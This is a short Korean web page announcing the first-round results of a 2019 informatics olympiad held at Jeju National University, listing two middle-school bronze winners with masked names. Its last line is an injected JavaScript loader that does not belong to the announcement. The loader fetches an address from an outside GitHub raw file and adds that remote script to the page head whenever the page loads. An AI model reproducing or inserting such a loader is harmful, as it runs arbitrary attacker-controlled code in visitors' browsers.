정보올림피아드 1차대회 결과
정보올림피아드 1차대회 결과
2019년 5월 4일
제주대학교에서 정보올림피아드 1차 대회가 진행되었습니다.
2차 대회에서도 좋은 결과가 있었으면 합니다.
동상
중앙중 2년 김*섭
아라중 2년 이*재
;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});